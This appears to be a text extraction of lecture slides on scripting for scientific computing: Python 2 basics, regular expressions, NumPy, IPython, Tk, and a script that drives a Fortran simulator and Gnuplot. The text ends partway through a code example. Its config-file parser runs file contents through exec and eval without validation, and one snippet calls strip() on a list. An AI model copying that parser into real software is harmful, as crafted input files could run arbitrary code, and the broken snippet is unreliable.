

![]() | Very high-level, often short, program written in a high-level scripting language |
![]() | Scripting languages: Unix shells, Tcl, Perl, Python, Ruby, Scheme, Rexx, JavaScript, VisualBasic, ... |
![]() | This course: Python + a taste of Perl and Bash (Unix shell) |

![]() | Glue other programs together |
![]() | Extensive text processing |
![]() | File and directory manipulation |
![]() | Often special-purpose code |
![]() | Many small interacting scripts may yield a big system |
![]() | Perhaps a special-purpose GUI on top |
![]() | Portable across Unix, Windows, Mac |
![]() | Interpreted program (no compilation+linking) |

![]() | shorter, more high-level programs |
![]() | much faster software development |
![]() | more convenient programming |
![]() | you feel more productive |
![]() | no variable declarations, but lots of consistency checks at run time |
![]() | lots of standardized libraries and tools |

![]() | Consider reading real numbers from a file, where each line
can contain an arbitrary number of real numbers:
1.1 9 5.2 1.762543E-02 0 0.01 0.001 9 3 7 |
![]() | Python solution:
F = open(filename, 'r') n = F.read().split() |

![]() | Perl solution:
open F, $filename; $s = join "", <F>; @n = split ' ', $s; |
![]() | Doing this in C++ or Java requires at least a loop, and in Fortran and C quite some code lines are necessary |

![]() | Suppose we want to read complex numbers written as text
(-3, 1.4) or (-1.437625E-9, 7.11) or ( 4, 2 ) |
![]() | Python solution:
m = re.search(r'\(\s*([^,]+)\s*,\s*([^,]+)\s*\)',
'(-3,1.4)')
re, im = [float(x) for x in m.groups()]
|
![]() | Perl solution:
$s="(-3, 1.4)"; ($re,$im)= $s=~ /\(\s*([^,]+)\s*,\s*([^,]+)\s*\)/; |

![]() | Regular expressions like
\(\s*([^,]+)\s*,\s*([^,]+)\s*\)constitute a powerful language for specifying text patterns |
![]() | Doing the same thing, without regular expressions, in Fortran and C requires quite some low-level code at the character array level |
![]() | Remark: we could read pairs (-3, 1.4) without using regular expressions,
s = '(-3, 1.4 )'
re, im = s[1:-1].split(',')
|

![]() | Example of a Python function:
def debug(leading_text, variable):
if os.environ.get('MYDEBUG', '0') == '1':
print leading_text, variable
|
![]() | Dumps any printable variable (number, list, hash, heterogeneous structure) |
![]() | Printing can be turned on/off by setting the environment variable MYDEBUG |

![]() | Templates can be used to mimic dynamically typed languages |
![]() | Not as quick and convenient programming:
template <class T>
void debug(std::ostream& o,
const std::string& leading_text,
const T& variable)
{
char* c = getenv("MYDEBUG");
bool defined = false;
if (c != NULL) { // if MYDEBUG is defined ...
if (std::string(c) == "1") { // if MYDEBUG is true ...
defined = true;
}
}
if (defined) {
o << leading_text << " " << variable << std::endl;
}
}
|

![]() | Object-oriented programming can also be used to parameterize types |
![]() | Introduce base class A and a range of subclasses, all with a (virtual) print function |
![]() | Let debug work with var as an A reference |
![]() | Now debug works for all subclasses of A |
![]() | Advantage: complete control of the legal variable types that debug are allowed to print (may be important in big systems to ensure that a function can allow make transactions with certain objects) |
![]() | Disadvantage: much more work, much more code, less reuse of debug in new occasions |

![]() | User-friendly environments (Matlab, Maple, Mathematica, S-Plus, ...) allow flexible function interfaces |
![]() | Novice user:
# f is some data plot(f) |
![]() | More control of the plot:
plot(f, label='f', xrange=[0,10]) |
![]() | More fine-tuning:
plot(f, label='f', xrange=[0,10], title='f demo',
linetype='dashed', linecolor='red')
|

![]() | Keyword arguments = function arguments with
keywords and default values, e.g.,
def plot(data, label='', xrange=None, title='',
linetype='solid', linecolor='black', ...)
|
![]() | The sequence and number of arguments in the call can be chosen by the user |

![]() | Inside the function one can test on the type of argument provided by the user |
![]() | xrange can be left out (value None), or given as a 2-element list (xmin/xmax), or given as a string 'xmin:xmax', or given as a single number (meaning 0:number) etc.
if xrange is not None: # i.e. xrange is specified by the user
if isinstance(xrange, list): # list [xmin,xmax] ?
xmin = xrange[0]; xmax = xrange[1]
elif isinstance(xrange, str): # string 'xmin:xmax' ?
xmin, xmax = re.search(r'(.*):(.*)',xrange).groups()
elif isinstance(xrange, float): # just a float?
xmin = 0; xmax = xrange
|

![]() | Many criteria can be used to classify computer languages |
![]() | Dynamically vs statically typed languages Python (dynamic): c = 1 # c is an integer c = [1,2,3] # c is a listC (static): double c; c = 5.2; # c can only hold doubles c = "a string..." # compiler error |

![]() | Weakly vs strongly typed languages Perl (weak): $b = '1.2' $c = 5*$b; # implicit type conversion: '1.2' -> 1.2Python (strong): b = '1.2' c = 5*b # illegal; no implicit type conversion |

![]() | Interpreted vs compiled languages |
![]() | Dynamically vs statically typed (or type-safe) languages |
![]() | High-level vs low-level languages (Python-C) |
![]() | Very high-level vs high-level languages (Python-C) |
![]() | Scripting vs system languages |

![]() | Code can be constructed and executed at run-time |
![]() | Consider an input file with the syntax
a = 1.2
no of iterations = 100
solution strategy = 'implicit'
c1 = 0
c2 = 0.1
A = 4
c3 = StringFunction('A*sin(x)')
|
![]() | How can we read this file and define variables a, no_of_iterations, solution_strategi, c1, c2, A with the specified values? |
![]() | And can we make c3 a function c3(x) as specified? |

![]() | The answer lies in this short and generic code:
file = open('inputfile.dat', 'r')
for line in file:
# first replace blanks on the left-hand side of = by _
variable, value = line.split('=').strip()
variable = re.sub(' ', '_', variable)
exec(variable + '=' + value) # magic...
|
![]() | This cannot be done in Fortran, C, C++ or Java! |

![]() | Here is a similar input file but with some additional
difficulties (strings without quotes and verbose function expressions as values):
set heat conduction = 5.0 set dt = 0.1 set rootfinder = bisection set source = V*exp(-q*t) is function of (t) with V=0.1, q=1 set bc = sin(x)*sin(y)*exp(-0.1*t) is function of (x,y,t) |
![]() | Can we read such files and define variables and functions? (here heat_conduction, dt and rootfinder, with the specified values, and source and bc as functions) |

# target line:
# set some name of variable = some value
from py4cs import misc
def parse_file(somefile):
namespace = {} # holds all new created variables
line_re = re.compile(r'set (.*?)=(.*)$')
for line in somefile:
m = line_re.search(line)
if m:
variable = m.group(1).strip()
value = m.group(2).strip()
# test if value is a StringFunction specification:
if value.find('is function of') >= 0:
# interpret function specification:
value = eval(string_function_parser(value))
else:
value = misc.str2obj(value) # string -> object
# space in variables names is illegal
variable = variable.replace(' ', '_')
code = 'namespace["%s"] = value' % variable
exec code
return namespace

# target line (with parameters A and q):
# expression is a function of (x,y) with A=1, q=2
# or (no parameters)
# expression is a function of (t)
def string_function_parser(text):
m = re.search(r'(.*) is function of \((.*)\)( with .+)?', text)
if m:
expr = m.group(1).strip(); args = m.group(2).strip()
# the 3rd group is optional:
prms = m.group(3)
if prms is None: # the 3rd group is optional
prms = '' # works fine below
else:
prms = ''.join(prms.split()[1:]) # strip off 'with'
# quote arguments:
args = ', '.join(["'%s'" % v for v in args.split(',')])
if args.find(',') < 0: # single argument?
args = args + ',' # add comma in tuple
args = '(' + args + ')' # tuple needs parenthesis
s = "StringFunction('%s', independent_variables=%s, %s)" % \
(expr, args, prms)
return s

![]() | Python has interfaces to many GUI libraries (Gtk, Qt, MFC, java.awt, java.swing, wxWindows, Tk) |
![]() | The simplest library to use: Tk |
![]() | Python + Tk = rapid GUI development |
![]() | Wrap your scripts with a GUI in half a day |
![]() | Easy for others to use your tools |
![]() | Indispensible for demos |
![]() | Quite complicated GUIs can also be made with Tk (and extensions) |

![]() | Make a window on the screen with the text 'Hello World' |
![]() | C + X11: 176 lines of ugly code |
![]() | Python + Tk: 6 lines of readable code
#!/usr/bin/env python
from Tkinter import *
root = Tk()
Label(root, text='Hello, World!',
foreground="white", background="black").pack()
root.mainloop()
|
![]() | Java and C++ codes are longer than Python + Tk |

![]() | Many applications need a GUI accessible through a Web page |
![]() | Perl and Python have extensive support for writing (server-side) dynamic Web pages (CGI scripts) |
![]() | Perl and Python are central tools in the e-commerce explosion |
![]() | Leading tools such as Plone and Zope (for dynamic web sites) are Python based |

![]() | C++ version implemented first |
![]() | Tcl version had more functionality |
![]() | C++ version: 2 months |
![]() | Tcl version: 1 day |
![]() | Effort ratio: 60 |

![]() | C++ version implemented first |
![]() | C++ version: 2-3 months |
![]() | Tcl version: 1 week |
![]() | Effort ratio: 8-12 |

![]() | Tcl version implemented first |
![]() | C version: 3 months |
![]() | Tcl version: 2 weeks |
![]() | Effort ratio: 6 |

![]() | Tcl version implemented first |
![]() | Tcl version had somewhat more functionality |
![]() | Java version: 3400 lines, 3-4 weeks |
![]() | Tcl version: 1600 lines, 1 week |
![]() | Effort ratio: 3-4 |

![]() | Perl and Python scripts are first compiled to byte-code |
![]() | The byte-code is then interpreted |
![]() | Text processing is usually as fast as in C |
![]() | Loops over large data structures might be very slow
for i in range(len(A)):
A[i] = ...
|
![]() | Fortran, C and C++ compilers are good at optimizing such loops at compile time and produce very efficient assembly code (e.g. 100 times faster) |
![]() | Fortunately, long loops in scripts can easily be migrated to Fortran or C |

![]() | Pure Python: 4s |
![]() | Pure Perl: 3s |
![]() | Pure Tcl: 11s |
![]() | Pure C (fscanf/fprintf): 1s |
![]() | Pure C++ (iostream): 3.6s |
![]() | Pure C++ (buffered streams): 2.5s |
![]() | Numerical Python modules: 2.2s (!) |
![]() | Remark: in practice, 100 000 data points are written and read in binary format, resulting in much smaller differences |

Language CPU-time lines of code C | 0.30 | 150 Java | 9.2 | 105 C++ (STL-deque) | 11.2 | 70 C++ (STL-list) | 1.5 | 70 Awk | 2.1 | 20 Perl | 1.0 | 18Machine: Pentium II running Windows NT

![]() | The application's main task is to connect together existing components |
![]() | The application includes a graphical user interface |
![]() | The application performs extensive string/text manipulation |
![]() | The design of the application code is expected to change significantly |
![]() | CPU-time intensive parts can be migrated to C/C++ or Fortran |

![]() | The application can be made short if it operates heavily on list or hash structures |
![]() | The application is supposed to communicate with Web servers |
![]() | The application should run without modifications on Unix, Windows, and Macintosh computers, also when a GUI is included |

![]() | Does the application implement complicated algorithms and data structures? |
![]() | Does the application manipulate large datasets so that execution speed is critical? |
![]() | Are the application's functions well-defined and changing slowly? |
![]() | Will type-safe languages be an advantage, e.g., in large development teams? |

![]() | Get the power of Unix also in non-Unix environments |
![]() | Automate manual interaction with the computer |
![]() | Customize your own working environment and become more efficient |
![]() | Increase the reliability of your work (what you did is documented in the script) |
![]() | Have more fun! |

![]() | Perl and Python are very popular in the open source movement and Linux environments |
![]() | Perl and Python are widely used for creating Web services and administering computer systems |
![]() | Perl and Python (and Tcl) replace 'home-made' (application-specific) scripting interfaces |
![]() | Many companies want candidates with Perl/Python experience |

![]() | Scripting languages are free |
![]() | What about companies that do mission-critical operations? |
![]() | Can we use Perl or Python when sending a man to Mars? |
![]() | Who is responsible for the quality of products like Perl and Python? |

![]() | Scripting languages are developed as a world-wide collaboration of volunteers (open source model) |
![]() | The open source community as a whole is responsible for the quality |
![]() | There is a single source for Perl and for Python |
![]() | This source is read, tested and controlled by a very large number of people (and experts) |
![]() | The reliability of large open source projects like Linux, Perl, and Python appears to be very good - at least as good as commercial software |

![]() | Scripting in general, but with most examples taken from scientific computing |
![]() | Aimed at novice scripters |
![]() | Flavor of lectures: 'getting started' |
![]() | Jump into useful scripts and dissect the code |
![]() | Learn more by programming |
![]() | Find examples, look up man pages, Web docs and textbooks on demand |
![]() | Get the overview |
![]() | Customize existing code |
![]() | Have fun and work with useful things |

![]() | Problem: you are not an expert (yet) |
![]() | Where to find detailed info, and how to understand it? |
![]() | The efficient programmer navigates quickly in the jungle of textbooks, man pages, README files, source code examples, Web sites, news groups, ... and has a gut feeling for what to look for |
![]() | The aim of the course is to improve your practical problem-solving abilities |
![]() | You think you know when you learn, are more sure when you can write, even more when you can teach, but certain when you can program (Alan Perlis) |

![]() | Dissection of complete introductory scripts |
![]() | Lists of common tasks (recipes!) |
![]() | Regular expressions and text processing |
![]() | CGI programming (dynamic Web pages) |
![]() | GUI programming with Python |
![]() | Creating effective working environments |
![]() | Combining Python with C/C++ or Fortran |
![]() | Software engineering (documentation, modules, version control) |



![]() | You will need Python in recent versions (at least v2.2) |
![]() | Several add-on modules are needed later on in the slides |
![]() | Here is a list of software needed for the Python part:
http://folk.uio.no/hpl/scripting/softwarelist.html |

![]() | These slides have a companion book: Scripting in Computational Science, 2nd edition, Texts in Computational Science and Engineering, Springer, 2006 |
![]() | Currentlly, we are working on the 3rd edition |
![]() | All examples can be downloaded as a tarfile
http://folk.uio.no/hpl/scripting/scripting-src.tar.gz |

![]() |
Pack scripting-src.tar.gz out in a directory and let scripting be an environment variable pointing to the top directory:
tar xvzf scripting-src.tar.gz export scripting=`pwd`All paths in these slides are given relative to scripting, e.g., src/py/intro/hw.py is reached as $scripting/src/py/intro/hw.py |

![]() | All computer languages intros start with a program that prints "Hello, World!" to the screen |
![]() | Scientific computing extension: add reading a number and computing its sine value |
![]() | The script (hw.py) should be run like this:
python hw.py 3.4or just (Unix) ./hw.py 3.4 |
![]() | Output:
Hello, World! sin(3.4)=-0.255541102027 |

![]() | how to read a command-line argument |
![]() | how to call a math (sine) function |
![]() | how to work with variables |
![]() | how to print text and numbers |

![]() | File hw.py:
#!/usr/bin/env python
# load system and math module:
import sys, math
# extract the 1st command-line argument:
r = float(sys.argv[1])
s = math.sin(r)
print "Hello, World! sin(" + str(r) + ")=" + str(s)
|
![]() | Make the file executable (on Unix):
chmod a+rx hw.py |

![]() | The first line specifies the interpreter of the script (here the first python program in your path) python hw.py 1.4 # first line is not treated as comment ./hw.py 1.4 # first line is used to specify an interpreter |
![]() | Even simple scripts must load modules:
import sys, math |
![]() | Numbers and strings are two different types:
r = sys.argv[1] # r is string s = math.sin(float(r)) # sin expects number, not string r # s becomes a floating-point number |

![]() | Desired output:
Hello, World! sin(3.4)=-0.255541102027 |
![]() | String concatenation:
print "Hello, World! sin(" + str(r) + ")=" + str(s)
|
![]() | C printf-like statement:
print "Hello, World! sin(%g)=%g" % (r,s) |
![]() | Variable interpolation:
print "Hello, World! sin(%(r)g)=%(s)g" % vars() |

%d : integer
%5d : integer in a field of width 5 chars
%-5d : integer in a field of width 5 chars,
but adjusted to the left
%05d : integer in a field of width 5 chars,
padded with zeroes from the left
%g : float variable in %f or %g notation
%e : float variable in scientific notation
%11.3e : float variable in scientific notation,
with 3 decimals, field of width 11 chars
%5.1f : float variable in fixed decimal notation,
with one decimal, field of width 5 chars
%.3f : float variable in fixed decimal form,
with three decimals, field of min. width
%s : string
%-20s : string in a field of width 20 chars,
and adjusted to the left

![]() | Single- and double-quoted strings work in the same way
s1 = "some string with a number %g" % r s2 = 'some string with a number %g' % r # = s1 |
![]() | Triple-quoted strings can be multi line with embedded
newlines:
text = """ large portions of a text can be conveniently placed inside triple-quoted strings (newlines are preserved)""" |
![]() | Raw strings, where backslash is backslash:
s3 = r'\(\s+\.\d+\)' # with ordinary string (must quote backslash): s3 = '\\(\\s+\\.\\d+\\)' |

![]() | Make a bookmark for \$scripting/doc.html |
![]() | Follow link to Index to Python Library Reference (complete on-line Python reference) |
![]() | Click on Python keywords, modules etc. |
![]() | Online alternative: pydoc, e.g., pydoc math |
![]() | pydoc lists all classes and functions in a module |
![]() | Alternative: Python in a Nutshell (or Beazley's textbook) |
![]() | Recommendation: use these slides and associated book together with the Python Library Reference, and learn by doing exercises! |

![]() | Read (x,y) data from a two-column file |
![]() | Transform y values to f(y) |
![]() | Write (x,f(y)) to a new file |
![]() | How to open, read, write and close files |
![]() | How to write and call a function |
![]() | How to work with arrays (lists) |

![]() | Usage:
./datatrans1.py infilename outfilename |
![]() | Read the two command-line arguments: input and output filenames infilename = sys.argv[1] outfilename = sys.argv[2] |
![]() | Command-line arguments are in sys.argv[1:] |
![]() | sys.argv[0] is the name of the script |

![]() | What if the user fails to provide two command-line arguments? |
![]() | Python aborts execution with an informative error message |
![]() | Manual handling of errors:
try:
infilename = sys.argv[1]
outfilename = sys.argv[2]
except:
# try block failed,
# we miss two command-line arguments
print 'Usage:', sys.argv[0], 'infile outfile'
sys.exit(1)
This is the common way of dealing with errors in Python,
called exception handling
|

![]() | Open files:
ifile = open( infilename, 'r') # r for reading ofile = open(outfilename, 'w') # w for writing afile = open(appfilename, 'a') # a for appending |
![]() | Read line by line:
for line in ifile:
# process line
|
![]() | Observe: blocks are indented; no braces! |

import math
def myfunc(y):
if y >= 0.0:
return y**5*math.exp(-y)
else:
return 0.0
# alternative way of calling module functions
# (gives more math-like syntax in this example):
from math import *
def myfunc(y):
if y >= 0.0:
return y**5*exp(-y)
else:
return 0.0

![]() | Input file format: two columns with numbers
0.1 1.4397 0.2 4.325 0.5 9.0 |
![]() | Read (x,y), transform y, write (x,f(y)):
for line in ifile:
pair = line.split()
x = float(pair[0]); y = float(pair[1])
fy = myfunc(y) # transform y value
ofile.write('%g %12.5e\n' % (x,fy))
|

![]() | This construction is more flexible and traditional in Python (and a bit strange...):
while 1:
line = ifile.readline() # read a line
if not line: break
# process line
i.e., an 'infinite' loop with the termination criterion
inside the loop
|

![]() | Read input file into list of lines:
lines = ifile.readlines() |
![]() | Now the 1st line is lines[0], the 2nd is lines[1], etc. |
![]() | Store x and y data in lists:
# go through each line,
# split line into x and y columns
x = []; y = [] # store data pairs in lists x and y
for line in lines:
xval, yval = line.split()
x.append(float(xval))
y.append(float(yval))
|

![]() | For-loop in Python:
for i in range(start,stop,inc):
...
for j in range(stop):
...
generates
i = start, start+inc, start+2*inc, ..., stop-1 j = 0, 1, 2, ..., stop-1 |
![]() | Loop over (x,y) values:
ofile = open(outfilename, 'w') # open for writing
for i in range(len(x)):
fy = myfunc(y[i]) # transform y value
ofile.write('%g %12.5e\n' % (x[i], fy))
ofile.close()
|

![]() | Method 1: write just the name of the scriptfile:
./datatrans1.py infile outfile # or datatrans1.py infile outfileif . (current working directory) or the directory containing datatrans1.py is in the path |
![]() | Method 2: run an interpreter explicitly:
python datatrans1.py infile outfileUse the first python program found in the path |
![]() | This works on Windows too (method 1 requires the right assoc/ftype bindings for .py files) |

![]() | In method 1, the interpreter to be used is specified in the first line |
![]() | Explicit path to the interpreter:
#!/usr/local/bin/pythonor perhaps your own Python interpreter: #!/home/hpl/projects/scripting/Linux/bin/python |
![]() | Using env to find the first Python interpreter in the path:
#!/usr/bin/env python |

![]() | Yes and no, depending on how you see it |
![]() | Python first compiles the script into bytecode |
![]() | The bytecode is then interpreted |
![]() | No linking with libraries; libraries are imported dynamically when needed |
![]() | It appears as there is no compilation |
![]() | Quick development: just edit the script and run! (no time-consuming compilation and linking) |
![]() | Extensive error checking at run time |

![]() | Easy to introduce intricate bugs?
| ||||
![]() | No, extensive consistency checks at run time replace the need for strong typing and compile-time checks | ||||
![]() | Example: sending a string to the sine function, math.sin('t'), triggers a run-time error (type incompatibility) | ||||
![]() | Example: try to open a non-existing file
./datatrans1.py qqq someoutfile
Traceback (most recent call last):
File "./datatrans1.py", line 12, in ?
ifile = open( infilename, 'r')
IOError:[Errno 2] No such file or directory:'qqq'
|

![]() | x and y in datatrans2.py are lists |
![]() | We can compute with lists element by element (as shown) |
![]() | However: using Numerical Python (NumPy) arrays instead of lists is much more efficient and convenient |
![]() | Numerical Python is an extension of Python: a new fixed-size array type and lots of functions operating on such arrays |

![]() | Import (more on this later...):
from py4cs.numpytools import * x = sequence(0, 1, 0.001) # 0.0, 0.001, 0.002, ..., 1.0 x = sin(x) # computes sin(x[0]), sin(x[1]) etc. |
![]() | x=sin(x) is 13 times faster than an explicit loop:
for i in range(len(x)):
x[i] = sin(x[i])
because sin(x) invokes an efficient loop in C
|

![]() | A special module loads tabular file data into NumPy arrays:
import py4cs.filetable f = open(infilename, 'r') x, y = py4cs.filetable.read_columns(f) f.close() |
![]() | Now we can compute with the NumPy arrays x and y:
from py4cs.numpytools import * # import everything in NumPy x = 10*x y = 2*y + 0.1*sin(x) |
![]() | We can easily write x and y back to a file:
f = open(outfilename, 'w') py4cs.filetable.write_columns(f, x, y) f.close() |

![]() | Multi-dimensional arrays can be constructed:
x = zeros(n, Float) # array with indices 0,1,...,n-1 x = zeros((m,n), Float) # two-dimensional array x[i,j] = 1.0 # indexing x = zeros((p,q,r), Float) # three-dimensional array x[i,j,k] = -2.1 x = sin(x)*cos(x) |
![]() | We can plot one-dimensional arrays:
from py4cs.anyplot.gnuplot_ import * x = sequence(0, 2, 0.1) y = x + sin(10*x) plot(x, y) |
![]() | NumPy has lots of math functions and operations |
![]() | SciPy is a comprehensive extension of NumPy |
![]() | NumPy + SciPy is a kind of Matlab replacement for many people |

![]() | Python statements can be run interactively in a Python shell |
![]() | The ``best'' shell is called IPython |
![]() | Sample session with IPython:
Unix/DOS> ipython ... In [1]:3*4-1 Out[1]:11 In [2]:from math import * In [3]:x = 1.2 In [4]:y = sin(x) In [5]:x Out[5]:1.2 In [6]:y Out[6]:0.93203908596722629 |

![]() | Up- and down-arrays: go through command history |
![]() | Emacs key bindings for editing previous commands |
![]() | The underscore variable holds the last output
In [6]:y Out[6]:0.93203908596722629 In [7]:_ + 1 Out[7]:1.93203908596722629 |

![]() | IPython supports TAB completion: write a part of a command or
name (variable, function, module), hit the TAB key, and IPython will
complete the word or show different alternatives:
In [1]: import math In [2]: math.<TABKEY> math.__class__ math.__str__ math.frexp math.__delattr__ math.acos math.hypot math.__dict__ math.asin math.ldexp ...or In [2]: my_variable_with_a_very_long_name = True In [3]: my<TABKEY> In [3]: my_variable_with_a_very_long_nameYou can increase your typing speed with TAB completion! |

In [1]:f = open('datafile', 'r')
IOError: [Errno 2] No such file or directory: 'datafile'
In [2]:f = open('.datatrans_infile', 'r')
In [3]:from py4cs.filetable import read_columns
In [4]:x, y = read_columns(f)
In [5]:x
Out[5]:array([ 0.1, 0.2, 0.3, 0.4])
In [6]:y
Out[6]:array([ 1.1 , 1.8 , 2.22222, 1.8 ])

![]() | Scripts can be run from IPython:
In [1]:run scriptfile arg1 arg2 ...e.g., In [1]:run datatrans2.py .datatrans_infile tmp1 |
![]() | IPython is integrated with Python's pdb debugger |
![]() | pdb can be automatically invoked when an exception occurs:
In [29]:%pdb on # invoke pdb automatically In [30]:run datatrans2.py infile tmp2 |

![]() | This happens when the infile name is wrong:
/home/work/scripting/src/py/intro/datatrans2.py
7 print "Usage:",sys.argv[0], "infile outfile"; sys.exit(1)
8
----> 9 ifile = open(infilename, 'r') # open file for reading
10 lines = ifile.readlines() # read file into list of lines
11 ifile.close()
IOError: [Errno 2] No such file or directory: 'infile'
> /home/work/scripting/src/py/intro/datatrans2.py(9)?()
-> ifile = open(infilename, 'r') # open file for reading
(Pdb) print infilename
infile
|

![]() | Pure Python: 4s |
![]() | Pure Perl: 3s |
![]() | Pure Tcl: 11s |
![]() | Pure C (fscanf/fprintf): 1s |
![]() | Pure C++ (iostream): 3.6s |
![]() | Pure C++ (buffered streams): 2.5s |
![]() | Numerical Python modules: 2.2s (!) |

![]() | The results reflect general trends:
| ||||||||
![]() | Unfair test? scripts use split on each line, C/C++ reads numbers consecutively | ||||||||
![]() | 100 000 data points would be stored in binary format in a real application, resulting in much smaller differences between the implementations |

![]() | Simple, classical Unix shell scripts are widely used to replace sequences of operating system commands | ||||
![]() | Typical application in numerical simulation:
| ||||
![]() | Programs are supposed to run in batch | ||||
![]() | We want to make such a gluing script in Python |

![]() | Parsing command-line options:
somescript -option1 value1 -option2 value2 |
![]() | Removing and creating directories |
![]() | Writing data to file |
![]() | Running applications (stand-alone programs) |



Code: oscillator (written in Fortran 77)

![]() | Input: m, b, c, and so on read from standard input |
![]() | How to run the code:
oscillator < filewhere file can be 3.0 0.04 1.0 ... (i.e., values of m, b, c, etc.) |
![]() | Results (t, y(t)) in sim.dat |



![]() | Commands:
set title 'case: m=3 b=0.7 c=1 f(y)=y A=5 ...'; # screen plot: (x,y) data are in the file sim.dat plot 'sim.dat' title 'y(t)' with lines; # hardcopies: set size ratio 0.3 1.5, 1.0; set term postscript eps mono dashed 'Times-Roman' 28; set output 'case.ps'; plot 'sim.dat' title 'y(t)' with lines; # make a plot in PNG format as well: set term png small; set output 'case.png'; plot 'sim.dat' title 'y(t)' with lines; |
![]() | Commands can be given interactively or put in a file |

![]() | Change oscillating system parameters by editing the simulator input file |
![]() | Run simulator:
oscillator < inputfile |
![]() | Plot:
gnuplot -persist -geometry 800x200 case.gp |
![]() | Plot annotations must be consistent with inputfile |
![]() | Let's automate! |

![]() | Usage:
./simviz1.py -m 3.2 -b 0.9 -dt 0.01 -case run1Sensible default values for all options |
![]() | Put simulation and plot files in a subdirectory (specified by -case run1) |

![]() | Set default values of m, b, c etc. |
![]() | Parse command-line options (-m, -b etc.) and assign new values to m, b, c etc. |
![]() | Create and move to subdirectory |
![]() | Write input file for the simulator |
![]() | Run simulator |
![]() | Write Gnuplot commands in a file |
![]() | Run Gnuplot |

![]() | Set default values of the script's input parameters:
m = 1.0; b = 0.7; c = 5.0; func = 'y'; A = 5.0; w = 2*math.pi; y0 = 0.2; tstop = 30.0; dt = 0.05; case = 'tmp1'; screenplot = 1 |
![]() | Examine command-line options in sys.argv:
# read variables from the command line, one by one:
while len(sys.argv) >= 2:
option = sys.argv[1]; del sys.argv[1]
if option == '-m':
m = float(sys.argv[1]); del sys.argv[1]
...
Note: sys.argv[1] is text, but we may want a float for numerical operations
|

![]() | Python offers two modules for command-line argument parsing: getopt and optparse |
![]() | These accept short options (-m) and long options (--mass) |
![]() | getopt examines the command line and returns pairs of options and values ((--mass, 2.3)) |
![]() | optparse is a bit more comprehensive to use and makes the command-line options available as attributes in an object |
![]() | See exercises for extending simviz1.py with (e.g.) getopt |
![]() | In this introductory example we rely on manual parsing since this exemplifies basic Python programming |

![]() | Python has a rich cross-platform operating system (OS) interface |
![]() | Skip Unix- or DOS-specific commands; do all OS operations in Python! |
![]() | Safe creation of a subdirectory:
dir = case # subdirectory name
import os, shutil
if os.path.isdir(dir): # does dir exist?
shutil.rmtree(dir) # yes, remove old files
os.mkdir(dir) # make dir directory
os.chdir(dir) # move to dir
|

f = open('%s.i' % case, 'w')
f.write("""
%(m)g
%(b)g
%(c)g
%(func)s
%(A)g
%(w)g
%(y0)g
%(tstop)g
%(dt)g
""" % vars())
f.close()
Note: triple-quoted string for multi-line output

![]() | Stand-alone programs can be run as
os.system(command)
# examples:
os.system('myprog < input_file')
os.system('ls *') # bad, Unix-specific
|
![]() | Better: get failure status and output from the command
cmd = 'oscillator < %s.i' % case # command to run
import commands
failure, output = commands.getstatusoutput(cmd)
if failure:
print 'running the oscillator code failed'
print output
sys.exit(1)
|

![]() | Make Gnuplot script:
f = open(case + '.gnuplot', 'w')
f.write("""
set title '%s: m=%g b=%g c=%g f(y)=%s A=%g ...';
...
""" % (case,m,b,c,func,A,w,y0,dt,case,case))
...
f.close()
|
![]() | Run Gnuplot:
cmd = 'gnuplot -geometry 800x200 -persist ' \
+ case + '.gnuplot'
failure, output = commands.getstatusoutput(cmd)
if failure:
print 'running gnuplot failed'; print output; sys.exit(1)
|

![]() | Our simviz1.py script is traditionally written as a Unix shell script | ||||||
![]() | What are the advantages of using Python here?
|

![]() | It is easy to replace Gnuplot by another plotting program |
![]() | Matlab, for instance:
f = open(case + '.m', 'w') # write to Matlab M-file
# (the character % must be written as %% in printf-like strings)
f.write("""
load sim.dat %% read sim.dat into sim matrix
plot(sim(:,1),sim(:,2)) %% plot 1st column as x, 2nd as y
legend('y(t)')
title('%s: m=%g b=%g c=%g f(y)=%s A=%g w=%g y0=%g dt=%g')
outfile = '%s.ps'; print('-dps', outfile) %% ps BW plot
outfile = '%s.png'; print('-dpng', outfile) %% png color plot
""" % (case,m,b,c,func,A,w,y0,dt,case,case))
if screenplot: f.write('pause(30)\n')
f.write('exit\n'); f.close()
if screenplot:
cmd = 'matlab -nodesktop -r ' + case + ' > /dev/null &'
else:
cmd = 'matlab -nodisplay -nojvm -r ' + case
failure, output = commands.getstatusoutput(cmd)
|

![]() | Suppose we want to run a series of experiments with different m values |
![]() | Put a script on top of simviz1.py,
./loop4simviz1.py m_min m_max dm \
[options as for simviz1.py]
having a loop over m and calling simviz1.py inside the loop
|
![]() | Each experiment is archived in a separate directory |
![]() | That is, loop4simviz1.py controls the -m and -case options to simviz1.py |

![]() | The first three arguments define the m values:
try:
m_min = float(sys.argv[1])
m_max = float(sys.argv[2])
dm = float(sys.argv[3])
except:
print 'Usage:',sys.argv[0],\
'm_min m_max m_increment [ simviz1.py options ]'
sys.exit(1)
|
![]() | Pass the rest of the arguments, sys.argv[4:], to simviz1.py |
![]() | Problem: sys.argv[4:] is a list, we need a string
['-b','5','-c','1.1'] -> '-b 5 -c 1.1' |

![]() | ' '.join(list) can make a string out of the list list, with a blank between
each item
simviz1_options = ' '.join(sys.argv[4:]) |
![]() | Example:
./loop4simviz1.py 0.5 2 0.5 -b 2.1 -A 3.6results in m_min: 0.5 m_max: 2.0 dm: 0.5 simviz1_options = '-b 2.1 -A 3.6' |

![]() | Cannot use
for m in range(m_min, m_max, dm):because range works with integers only |
![]() | A while-loop is appropriate:
m = m_min
while m <= m_max:
case = 'tmp_m_%g' % m
s = 'python simviz1.py %s -m %g -case %s' % \
(simviz1_options,m,case)
failure, output = commands.getstatusoutput(s)
m += dm
(Note: our -m and -case will override any -m or
-case option provided by the user)
|

![]() | Many runs can be handled; need a way to browse the results |
![]() | Idea: collect all plots in a common HTML file:
html = open('tmp_mruns.html', 'w')
html.write('<HTML><BODY BGCOLOR="white">\n')
m = m_min
while m <= m_max:
case = 'tmp_m_%g' % m
cmd = 'python simviz1.py %s -m %g -case %s' % \
(simviz1_options, m, case)
failure, output = commands.getstatusoutput(cmd)
html.write('<H1>m=%g</H1> <IMG SRC="%s">\n' \
% (m,os.path.join(case,case+'.png')))
m += dm
html.write('</BODY></HTML>\n')
|

![]() | For compact printing a PostScript file with small-sized versions of all the plots is useful |
![]() | epsmerge (Perl script) is an appropriate tool:
# concatenate file1.ps, file2.ps, and so on to
# one single file figs.ps, having pages with
# 3 rows with 2 plots in each row (-par preserves
# the aspect ratio of the plots)
epsmerge -o figs.ps -x 2 -y 3 -par \
file1.ps file2.ps file3.ps ...
|
![]() | Can use this technique to make a compact report of the generated PostScript files for easy printing |

psfiles = [] # plot files in PostScript format
...
while m <= m_max:
